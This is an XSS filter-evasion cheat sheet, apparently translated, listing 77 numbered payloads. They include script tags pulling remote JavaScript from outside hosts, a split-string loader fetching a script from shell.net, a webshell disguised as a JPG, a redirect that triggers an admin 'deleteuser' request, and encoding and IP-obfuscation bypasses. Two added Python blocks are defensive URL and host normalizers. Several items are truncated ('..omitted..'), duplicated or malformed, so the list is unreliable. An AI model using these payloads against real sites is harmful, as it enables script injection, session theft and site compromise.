Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the webshell and change the shell to JPG image format; when the image-format shell is accessed, our shell is executed as well.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective here in China, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

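Items 3 to 19 all target the same weak check: a filter that looks for the literal string javascript: in an attribute value. The following added example (not from the original page) is a defender-side check in Python that decodes HTML character references, strips the control characters browsers ignore inside a URL and then compares the scheme case-insensitively, so the obfuscated spellings above collapse to one scheme; the function names and sample inputs are constructed for this example.

```python
import html
import re

# Schemes that execute code when used as the target of SRC, HREF or url().
# "data" is included because a data: URL can carry a complete HTML document.
SCRIPT_SCHEMES = frozenset({"javascript", "vbscript", "livescript", "data"})

# Browsers strip leading C0 controls/spaces from a URL and drop tab, LF, CR
# (and, in old engines, NUL) anywhere inside it, which the variants above use.
_LEADING_JUNK = re.compile(r"^[\x00-\x20]+")
_EMBEDDED_JUNK = re.compile(r"[\x00\t\n\r]")


def normalize_url(value: str) -> str:
    """Reduce an attribute value to the form the browser actually interprets.

    html.unescape() decodes decimal and hex character references with or
    without a trailing semicolon (&#106; &#106 &#x6A); applying it twice
    also undoes one level of double encoding such as &amp;#106;.
    """
    decoded = html.unescape(html.unescape(value))
    return _EMBEDDED_JUNK.sub("", _LEADING_JUNK.sub("", decoded))


def url_scheme(value: str) -> str:
    """Lower-cased scheme of the normalized value, or "" for a relative URL."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", normalize_url(value))
    return match.group(1).lower() if match else ""


def is_script_url(value: str) -> bool:
    """True when the value would run script instead of fetching a resource."""
    return url_scheme(value) in SCRIPT_SCHEMES


# Constructed samples (not from the page) for the case, entity, tab/LF/CR,
# NUL and leading-whitespace variants; a sound filter must flag all of them.
CONSTRUCTED_SAMPLES = (
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert('XSS')",
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "jav\tascript:alert('XSS')",
    "jav\nascript:alert('XSS')",
    "jav\rascript:alert('XSS')",
    "java\x00script:alert('XSS')",
    " \x0ejavascript:alert('XSS')",
)
```

The check is deliberately applied to the decoded value rather than the raw attribute text, because that is the only representation the browser ever acts on.
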
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with a URL link
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE tag (made up of an open angle bracket and a name starting with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, your XSS code can be mixed in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot (absolute DNS)
<A HREF="http://www.google.com./">XSS</A>

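Items 70 to 76 show the same host written in several notations, which defeats any allowlist or filter that compares URL strings literally. The following added example (not from the original page) canonicalizes the host before comparing: scheme-relative URLs are accepted, the trailing dot is removed, and decimal, hex, octal and mixed IPv4 spellings are folded to dotted-quad form. The allowlist and function names are constructed for this example; the IPv4 spellings it is exercised with are modelled on items 70 to 73.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

_PART = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")
ALLOWLIST = frozenset({"www.google.com", "192.168.0.1"})  # constructed sample

def _ipv4_part(part: str) -> int:
    """One dotted component under inet_aton rules: 0x is hex, leading 0 is octal."""
    if not _PART.fullmatch(part):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)

def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted-quad form of any legacy IPv4 spelling, or None if not IPv4."""
    parts = host.rstrip(".").split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        *head, last = [_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    # Leading parts are one byte each; the last part fills the remaining
    # bytes, which is what lets a single number (item 70) resolve.
    if any(n > 255 for n in head) or last >= 256 ** (4 - len(head)):
        return None
    value = 0
    for n in head:
        value = (value << 8) | n
    value = (value << (8 * (4 - len(head)))) + last
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def canonical_host(host: str) -> str:
    """Lower-case, drop the absolute-DNS trailing dot (item 76), fold IPv4."""
    host = host.lower().rstrip(".")
    return canonical_ipv4(host) or host

def url_host(url: str) -> str:
    """Canonical host of a URL; scheme-relative //host/ (item 74) is accepted."""
    return canonical_host(urlsplit(url).hostname or "")

def host_allowed(url: str, allowlist=ALLOWLIST) -> bool:
    """Allowlist check that canonicalizes both sides before comparing."""
    return url_host(url) in {canonical_host(h) for h in allowlist}
```
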
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>